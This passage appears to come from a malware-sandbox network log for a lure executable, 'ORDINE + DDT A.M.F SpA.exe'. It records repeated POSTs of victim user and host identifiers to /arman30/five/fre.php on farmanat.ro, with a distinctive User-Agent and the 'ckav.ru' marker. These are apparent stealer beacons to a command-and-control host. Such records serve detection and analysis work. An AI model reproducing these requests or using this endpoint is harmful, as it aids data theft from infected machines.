                                              Nov 25, 2021 10:53:54.975392103 CET7262OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:55.009502888 CET7262OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:55.059514046 CET7262INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              684192.168.11.2050529176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:55.408843994 CET7263OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:55.443159103 CET7264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:55.499511957 CET7264INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              685192.168.11.2050530176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:55.934689045 CET7265OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:55.968638897 CET7265OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:56.019726038 CET7265INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              686192.168.11.2050531176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:56.441220045 CET7266OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:56.475426912 CET7266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:56.527676105 CET7267INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              687192.168.11.2050532176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:56.962356091 CET7267OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:56.996151924 CET7268OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:57.046289921 CET7268INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              688192.168.11.2050533176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:57.518579960 CET7269OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:57.551886082 CET7269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:57.606286049 CET7269INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              689192.168.11.2050534176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:58.021953106 CET7270OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:58.055908918 CET7270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:58.107873917 CET7271INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              69192.168.11.2049905176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:44.811528921 CET6405OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:44.845005035 CET6405OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:44.900487900 CET6405INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              690192.168.11.2050535176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:58.510118008 CET7271OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:58.543663025 CET7272OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:58.593468904 CET7272INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              691192.168.11.2050536176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:59.032651901 CET7273OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:59.066267967 CET7273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:59.116414070 CET7273INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              692192.168.11.2050537176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:59.532044888 CET7274OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:59.566987038 CET7274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:59.620790958 CET7275INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              693192.168.11.2050538176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:59.984023094 CET7275OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:00.018450975 CET7276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:00.069199085 CET7276INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              694192.168.11.2050539176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:00.499475956 CET7277OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:00.533643007 CET7277OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:00.586044073 CET7277INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              695192.168.11.2050540176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:00.994605064 CET7278OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:01.028495073 CET7278OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:01.082277060 CET7279INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              696192.168.11.2050541176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:01.467669964 CET7279OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:01.501169920 CET7280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:01.550327063 CET7280INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              697192.168.11.2050542176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:01.962780952 CET7281OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:01.997369051 CET7281OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:02.047734022 CET7281INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              698192.168.11.2050543176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:02.473185062 CET7282OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:02.506793022 CET7282OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:02.557339907 CET7283INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              699192.168.11.2050544176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:02.999053001 CET7283OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:03.033376932 CET7284OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:03.095596075 CET7284INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.11.2049826176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:04.640363932 CET6308OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:04.674635887 CET6309OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:04.724145889 CET6309INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
